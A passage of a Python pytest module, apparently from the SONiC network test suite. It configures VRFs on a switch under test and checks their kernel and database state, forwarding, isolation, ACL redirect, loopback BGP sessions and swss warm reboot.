Vlan2000 Ethernet13 eth13 e13mv1 ns2000 192.168.0.2/21
FC00:192::2/117
'''
vlan_peer_ips = {}
vlan_peer_vrf2ns_map = {}
for vlan in cfg_facts['VLAN'].keys():
ns = 'ns' + vlan.strip('Vlan')
vrf = cfg_facts['VLAN_INTERFACE'][vlan]['vrf_name']
vlan_peer_vrf2ns_map[vrf] = ns
vlan_port = get_vlan_members(vlan, cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
# deploy peer namespace on ptf
ptfhost.shell("ip netns add {}".format(ns))
# bind port to namespace
ptfhost.shell("ip link add e{}mv1 link eth{} type macvlan mode bridge".format(vlan_peer_port, vlan_peer_port))
ptfhost.shell("ip link set e{}mv1 netns {}".format(vlan_peer_port, ns))
ptfhost.shell("ip netns exec {} ip link set dev e{}mv1 up".format(ns, vlan_peer_port))
# setup peer ip on ptf
if (vrf, vlan_peer_port) not in vlan_peer_ips:
vlan_peer_ips[(vrf, vlan_peer_port)] = {'ipv4': [], 'ipv6': []}
vlan_ips = get_intf_ips(vlan, cfg_facts)
for ver, ips in vlan_ips.iteritems():
for ip in ips:
neigh_ip = IPNetwork("{}/{}".format(ip.ip+1, ip.prefixlen))
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, neigh_ip, vlan_peer_port))
# ping to trigger neigh resolving
ping_cmd = 'ping' if neigh_ip.version ==4 else 'ping6'
duthost.shell("{} -I {} {} -c 1 -f -W1".format(ping_cmd, vrf, neigh_ip.ip), module_ignore_errors=True)
vlan_peer_ips[(vrf, vlan_peer_port)][ver].append(neigh_ip)
return vlan_peer_ips, vlan_peer_vrf2ns_map
def cleanup_vlan_peer(ptfhost, vlan_peer_vrf2ns_map):
for vrf, ns in vlan_peer_vrf2ns_map.iteritems():
ptfhost.shell("ip netns del {}".format(ns))
def gen_vrf_fib_file(vrf, tbinfo, ptfhost, render_file, dst_intfs=None, \
limited_podset_number=10, limited_tor_number=10):
dst_intfs = dst_intfs if dst_intfs else get_default_vrf_fib_dst_intfs(vrf, tbinfo)
extra_vars = {
'testbed_type': tbinfo['topo']['name'],
'props': g_vars['props'],
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'dst_intfs': dst_intfs,
'limited_podset_number': limited_podset_number,
'limited_tor_number': limited_tor_number
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_fib.j2", dest=render_file)
def get_default_vrf_fib_dst_intfs(vrf, tbinfo):
'''
Get default vrf fib destination interfaces(PortChannels) according to the given vrf.
The test configuration is dynamic and can work with 4 and 8 PCs as the number of VMs.
The first half of PCs are related to Vrf1 and the second to Vrf2.
'''
dst_intfs = []
vms_num = len(tbinfo['topo']['properties']['topology']['VMs'])
if vrf == 'Vrf1':
dst_intfs_range = list(range(1, int(vms_num / 2) + 1))
else:
dst_intfs_range = list(range(int(vms_num / 2) + 1, vms_num + 1))
for intfs_num in dst_intfs_range:
dst_intfs.append('PortChannel000{}'.format(intfs_num))
return dst_intfs
def gen_vrf_neigh_file(vrf, ptfhost, render_file):
extra_vars = {
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'intf_ips': g_vars['vrf_intfs'][vrf]
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_neigh.j2", dest=render_file)
def gen_specific_neigh_file(dst_ips, dst_ports, render_file, ptfhost):
dst_ports = [str(port) for port_list in dst_ports for port in port_list]
tmp_file = tempfile.NamedTemporaryFile()
for ip in dst_ips:
tmp_file.write('{} [{}]\n'.format(ip, ' '.join(dst_ports)))
tmp_file.flush()
ptfhost.copy(src=tmp_file.name, dest=render_file)
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
dut_index = str(tbinfo['duts_map'][hostname])
ptf_ports = set(tbinfo['topo']['ptf_map'][dut_index].values())
disabled_ports = set()
if dut_index in tbinfo['topo']['ptf_map_disabled']:
disabled_ports = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
return ptf_ports - disabled_ports
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
ports = set()
for vlan in mg_facts['minigraph_vlans']:
for member in mg_facts['minigraph_vlans'][vlan]['members']:
ports.add(mg_facts['minigraph_port_indices'][member])
return ports
# fixtures
@pytest.fixture(scope="module")
def dut_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return duthost.facts
@pytest.fixture(scope="module")
def cfg_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return get_cfg_facts(duthost)
def restore_config_db(localhost, duthost, ptfhost):
# In case something went wrong in previous reboot, wait until the DUT is accessible to ensure that
# the `mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json` is executed on DUT.
# If the DUT is still inaccessible after timeout, we may have already lose the DUT. Something sad happened.
localhost.wait_for(host=g_vars["dut_ip"],
port=22,
state='started',
search_regex='OpenSSH_[\\w\\.]+ Debian',
timeout=180) # Similiar approach to increase the chance that the next line get executed.
duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
reboot(duthost, localhost)
if 'vlan_peer_vrf2ns_map' in g_vars:
cleanup_vlan_peer(ptfhost, g_vars['vlan_peer_vrf2ns_map'])
@pytest.fixture(scope="module", autouse=True)
def setup_vrf(tbinfo, duthosts, rand_one_dut_hostname, ptfhost, localhost, skip_test_module_over_backend_topologies):
duthost = duthosts[rand_one_dut_hostname]
# backup config_db.json
duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
## Setup global variables
global g_vars
try:
## Setup dut
g_vars["dut_ip"] = duthost.host.options["inventory_manager"].get_host(duthost.hostname).vars["ansible_host"]
duthost.critical_services = ["swss", "syncd", "database", "teamd", "bgp"] # Don't care about 'pmon' and 'lldp' here
cfg_t0 = get_cfg_facts(duthost) # generate cfg_facts for t0 topo
setup_vrf_cfg(duthost, localhost, cfg_t0)
# Generate cfg_facts for t0-vrf topo, should not use cfg_facts fixture here. Otherwise, the cfg_facts
# fixture will be executed before setup_vrf and will have the original non-VRF config facts.
cfg_facts = get_cfg_facts(duthost)
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear nd")
duthost.shell("sonic-clear fdb all")
with open("../ansible/vars/topo_{}.yml".format(tbinfo['topo']['name']), 'r') as fh:
g_vars['topo_properties'] = yaml.safe_load(fh)
g_vars['props'] = g_vars['topo_properties']['configuration_properties']['common']
g_vars['vlan_peer_ips'], g_vars['vlan_peer_vrf2ns_map'] = setup_vlan_peer(duthost, ptfhost, cfg_facts)
g_vars['vrf_intfs'] = get_vrf_intfs(cfg_facts)
g_vars['vrf_intf_member_port_indices'], g_vars['vrf_member_port_indices'] = get_vrf_ports(cfg_facts)
except Exception as e:
# Ensure that config_db is restored.
# If exception is raised in setup, the teardown code won't be executed. That's why we need to capture
# exception and do cleanup here in setup part (code before 'yield').
logger.error("Exception raised in setup: {}".format(repr(e)))
logger.error(json.dumps(traceback.format_exception(*sys.exc_info()), indent=2))
restore_config_db(localhost, duthost, ptfhost)
# Setup failed. There is no point to continue running the cases.
pytest.fail("VRF testing setup failed") # If this line is hit, script execution will stop here
# --------------------- Testing -----------------------
yield
# --------------------- Teardown -----------------------
restore_config_db(localhost, duthost, ptfhost)
@pytest.fixture
def partial_ptf_runner(request, ptfhost, tbinfo, dut_facts):
def _partial_ptf_runner(testname, **kwargs):
params = {'testbed_type': tbinfo['topo']['name'],
'router_macs': [dut_facts['router_mac']],
'ptf_test_port_map': PTF_TEST_PORT_MAP
}
params.update(kwargs)
ptf_runner(host=ptfhost,
testdir="ptftests",
platform_dir="ptftests",
testname=testname,
params=params,
log_file="/tmp/{}.{}.log".format(request.cls.__name__, request.function.__name__))
return _partial_ptf_runner
@pytest.fixture(scope="module")
def mg_facts(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
return mg_facts
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
dut_vlan_mac = None
for vlan in config_facts.get('VLAN', {}).values():
if 'mac' in vlan:
logger.debug('Found VLAN mac')
dut_vlan_mac = vlan['mac']
break
if not dut_vlan_mac:
logger.debug('No VLAN mac, use default router_mac')
dut_vlan_mac = duthost.facts['router_mac']
return dut_vlan_mac
@pytest.fixture(scope="module", autouse=True)
def ptf_test_port_map(tbinfo, duthosts, mg_facts, ptfhost, rand_one_dut_hostname, vlan_mac):
duthost = duthosts[rand_one_dut_hostname]
ptf_test_port_map = {}
enabled_ptf_ports = get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
for port in enabled_ptf_ports:
if port in vlan_ptf_ports:
target_mac = vlan_mac
else:
target_mac = duthost.facts['router_mac']
ptf_test_port_map[str(port)] = {
'target_dut': 0,
'target_mac': target_mac
}
ptfhost.copy(content=json.dumps(ptf_test_port_map), dest=PTF_TEST_PORT_MAP)
# tests
class TestVrfCreateAndBind():
def test_vrf_in_kernel(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in kernel
res = duthost.shell("ip link show type vrf | grep Vrf")
for vrf in cfg_facts['VRF'].keys():
assert vrf in res['stdout'], "%s should be created in kernel!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("ip link show %s" % intf)
assert vrf in res['stdout'], "The master dev of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_appl_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in app_db
for vrf in cfg_facts['VRF'].keys():
res = duthost.shell("redis-cli -n 0 keys VRF_TABLE:%s" % vrf)
assert vrf in res['stdout'], "%s should be added in APPL_DB!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("redis-cli -n 0 hgetall \"INTF_TABLE:%s\"" % intf)
assert vrf in res['stdout'], "The vrf of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_asic_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in asic_db
vrf_count = len(cfg_facts['VRF'].keys()) + 1 # plus default virtual router
res = duthost.shell("redis-cli -n 1 keys *VIRTUAL_ROUTER*")
assert len(res['stdout_lines']) == vrf_count
class TestVrfNeigh():
def test_ping_lag_neigh(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
continue
vrf, neigh_ip = neigh.split('|')
if IPNetwork(neigh_ip).version == 4:
ping_cmd = 'ping'
else:
ping_cmd = 'ping6'
cmd = "{} {} -I {} -c 3 -f".format(ping_cmd, neigh_ip, vrf)
duthost.shell(cmd)
def test_ping_vlan_neigh(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for (vrf, _), neigh_ips in g_vars['vlan_peer_ips'].iteritems():
for ver, ips in neigh_ips.iteritems():
ping_cmd = 'ping' if ver == 'ipv4' else 'ping6'
for ip in ips:
duthost.shell("{} {} -c 3 -I {} -f".format(ping_cmd, ip.ip, vrf))
def test_vrf1_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfFib():
@pytest.fixture(scope="class", autouse=True)
def setup_fib_test(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
def test_show_bgp_summary(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
props = g_vars['props']
route_count = props['podset_number'] * props['tor_number'] * props['tor_subnet_number']
for vrf in cfg_facts['VRF']:
bgp_summary_string = duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout']
bgp_summary = json.loads(bgp_summary_string)
for info in bgp_summary:
for peer, attr in bgp_summary[info]['peers'].iteritems():
prefix_count = attr['pfxRcd']
# skip ipv6 peers under 'ipv4Unicast' and compare only ipv4 peers under 'ipv4Unicast', and ipv6 peers under 'ipv6Unicast'
if info == "ipv4Unicast" and attr['idType'] == 'ipv6':
continue
else:
assert int(prefix_count) == route_count, "%s should received %s route prefixs!" % (peer, route_count)
def test_vrf1_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfIsolation():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_isolation(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
def test_neigh_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_neigh_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_fib_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_fib_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
class TestVrfAclRedirect():
c_vars = {}
@pytest.fixture(scope="class", autouse=True)
def is_redirect_supported(self, duthosts, rand_one_dut_hostname):
"""
Check if switch supports acl redirect_action, if not then skip test cases
"""
duthost = duthosts[rand_one_dut_hostname]
switch_cap = duthost.switch_capabilities_facts()['ansible_facts']['switch_capabilities']['switch']
res = [capabilities for capabilities in switch_cap.values() if "REDIRECT_ACTION" in capabilities]
if not res:
pytest.skip("Switch does not support ACL REDIRECT_ACTION")
@pytest.fixture(scope="class", autouse=True)
def setup_acl_redirect(self, duthosts, rand_one_dut_hostname, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
# make sure neighs from Vlan2000 are resolved
vlan_peer_port = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][0]
vlan_neigh_ip = g_vars['vlan_peer_ips'][('Vrf2', vlan_peer_port)]['ipv4'][0]
duthost.shell("ping {} -I {} -c 3 -f".format(vlan_neigh_ip.ip, 'Vrf2'))
vrf_intf_ports = g_vars['vrf_intf_member_port_indices']
src_ports = [vrf_intf_ports['Vrf1']['Vlan1000'][0]]
dst_ports = [vrf_intf_ports['Vrf1']['PortChannel0001']]
pc1_intf_ips = get_intf_ips('PortChannel0001', cfg_facts)
pc1_v4_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv4'] ]
pc1_v6_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv6'] ]
pc2_if_name = 'PortChannel0002'
pc2_if_ips = get_intf_ips(pc2_if_name, cfg_facts)
pc2_v4_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv4'] ]
pc2_v6_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv6'] ]
pc_vrf2_if_name = 'PortChannel000{}'.format(len(tbinfo['topo']['properties']['topology']['VMs']))
pc_vrf2_if_ips = get_intf_ips(pc_vrf2_if_name, cfg_facts)
pc_vrf2_v4_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv4'] ]
pc_vrf2_v6_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv6'] ]
redirect_dst_ips = pc2_v4_neigh_ips + pc_vrf2_v4_neigh_ips
redirect_dst_ipv6s = pc2_v6_neigh_ips + pc_vrf2_v6_neigh_ips
redirect_dst_ports = []
redirect_dst_ports.append(vrf_intf_ports['Vrf1'][pc2_if_name])
redirect_dst_ports.append(vrf_intf_ports['Vrf2'][pc_vrf2_if_name])
self.c_vars['src_ports'] = src_ports
self.c_vars['dst_ports'] = dst_ports
self.c_vars['redirect_dst_ports'] = redirect_dst_ports
self.c_vars['pc1_v4_neigh_ips'] = pc1_v4_neigh_ips
self.c_vars['pc1_v6_neigh_ips'] = pc1_v6_neigh_ips
# load acl redirect configuration
extra_vars = {
'src_port': get_vlan_members('Vlan1000', cfg_facts)[0],
'redirect_dst_ips': redirect_dst_ips,
'redirect_dst_ipv6s': redirect_dst_ipv6s
}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_acl_redirect.j2", dest="/tmp/vrf_acl_redirect.json")
duthost.shell("config load -y /tmp/vrf_acl_redirect.json")
# -------- Testing ----------
yield
# -------- Teardown ----------
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V4|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V6|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V4'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V6'")
def test_origin_ports_recv_no_pkts_v4(self, partial_ptf_runner, ptfhost):
# verify origin dst ports should not receive packets any more
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
fib_info_files=['/tmp/pc01_neigh_ipv4.txt']
)
def test_origin_ports_recv_no_pkts_v6(self, partial_ptf_runner, ptfhost):
# verify origin dst ports should not receive packets any more
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
fib_info_files=['/tmp/pc01_neigh_ipv6.txt']
)
def test_redirect_to_new_ports_v4(self, partial_ptf_runner, ptfhost):
# verify redicect ports should receive packets
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv4.txt']
)
def test_redirect_to_new_ports_v6(self, partial_ptf_runner, ptfhost):
# verify redicect ports should receive packets
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv6.txt']
)
class TestVrfLoopbackIntf():
c_vars = {}
announce_prefix = '10.10.10.0/26'
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
lb0_ip_facts = get_intf_ips('Loopback0', cfg_facts)
vlan1000_ip_facts = get_intf_ips('Vlan1000', cfg_facts)
lb2_ip_facts = get_intf_ips('Loopback2', cfg_facts)
vlan2000_ip_facts = get_intf_ips('Vlan2000', cfg_facts)
self.c_vars['lb0_ip_facts'] = lb0_ip_facts
self.c_vars['lb2_ip_facts'] = lb2_ip_facts
self.c_vars['vlan1000_ip_facts'] = vlan1000_ip_facts
self.c_vars['vlan2000_ip_facts'] = vlan2000_ip_facts
# deploy routes to loopback
for ver, ips in lb0_ip_facts.iteritems():
for vlan_ip in vlan1000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip, nexthop))
for ver, ips in lb2_ip_facts.iteritems():
for vlan_ip in vlan2000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip, nexthop))
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=1")
# -------- Testing ----------
yield
# -------- Teardown ----------
# routes on ptf could be flushed when remove vrfs
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=0")
def test_ping_vrf1_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb0_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, currently ping(4) does not support using
# an ip of loopback intface as source(it complains 'Cannot assign
# requested address'). An alternative is ping the loopback address
# from ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan1000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf1 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
def test_ping_vrf2_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb2_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, currently ping(4) does not support using
# an ip of loopback intface as source(it complains 'Cannot assign
# requested address'). An alternative is ping the loopback address
# from ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan2000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf2 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
@pytest.fixture
def setup_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# ----------- Setup ----------------
# FIXME Create a dummy bgp session.
# Workaroud to overcome the bgp socket issue.
# When there are only vrf bgp sessions and
# net.ipv4.tcp_l3mdev_accept=1, bgpd(7.0) does
# not create bgp socket for sessions.
duthost.shell("vtysh -c 'config terminal' -c 'router bgp 65444'")
# vrf1 args, vrf2 use the same as vrf1
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
vlan_port = get_vlan_members('Vlan1000', cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
ptf_direct_ip = g_vars['vlan_peer_ips'][('Vrf1', vlan_peer_port)]['ipv4'][0]
# add route to ptf_speaker_ip
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
nh = ips['ipv4'][0].ip
duthost.shell("vtysh -c 'configure terminal' -c 'ip route {} {} vrf {}'".format(peer_range, nh , vrf))
duthost.shell("ping {} -I {} -c 3 -f -W2".format(nh, vrf))
# add speaker ips to ptf macvlan ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
exabgp_dir = "/root/exabgp"
ptfhost.file(path=exabgp_dir, state="directory")
extra_vars = {
'exabgp_dir': exabgp_dir,
'announce_prefix': self.announce_prefix,
'peer_asn' : cfg_facts['DEVICE_METADATA']['localhost']['bgp_asn'],
'my_asn' : bgp_speaker_asn,
'speaker_ip': ptf_speaker_ip.ip,
'direct_ip' : ptf_direct_ip.ip,
'namespace' : g_vars['vlan_peer_vrf2ns_map'].values(),
'lo_addr' : get_intf_ips('Loopback0', cfg_facts)['ipv4'][0].ip
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, 'config.ini'))
# deploy start script
ptfhost.template(src="vrf/bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, 'start.sh'), mode="u+rwx")
# kill exabgp if any
ptfhost.shell("pkill exabgp || true")
# start exabgp instance
ptfhost.shell("bash %s/start.sh" % exabgp_dir)
# ensure exabgp started
ptfhost.shell("pgrep exabgp")
# make sure routes announced to bgp neighbors
time.sleep(10)
# -------- Testing ----------
yield
# -------- Teardown ---------
# del route to ptf_speaker_ip on dut
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
duthost.shell("vtysh -c 'configure terminal' -c 'no ip route {} {} vrf {}'".format(peer_range, ips['ipv4'][0], vrf))
# kill exabgp
ptfhost.shell("pkill exabgp || true")
# del speaker ips from ptf ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address del {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
# FIXME workround to overcome the bgp socket issue
#duthost.shell("vtysh -c 'config terminal' -c 'no router bgp 65444'")
@pytest.mark.usefixtures('setup_bgp_with_loopback')
def test_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
for vrf in cfg_facts['VRF']:
bgp_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout'])
route_info = duthost.shell("vtysh -c 'show bgp vrf {} ipv4 {}'".format(vrf, self.announce_prefix))
# Verify bgp sessions are established
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['state'] == 'Established', \
"Bgp peer {} should be Established!".format(ptf_speaker_ip.ip)
# Verify accepted prefixes of the dynamic neighbors are correct
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['pfxRcd'] == 1
class TestVrfWarmReboot():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_warm_reboot(self, ptfhost, tbinfo):
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt',
limited_podset_number=50,
limited_tor_number=16)
# -------- Testing ----------
yield
# -------- Teardown ----------
#FIXME Might need cold reboot if test failed?
pass
def test_vrf_swss_warm_reboot(self, duthosts, rand_one_dut_hostname, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
# enable swss warm-reboot
duthost.shell("config warm_restart enable swss")
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que, # use for store exception infos
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start swss warm-reboot
duthost.shell("service swss restart")
logger.info("Warm reboot swss...")
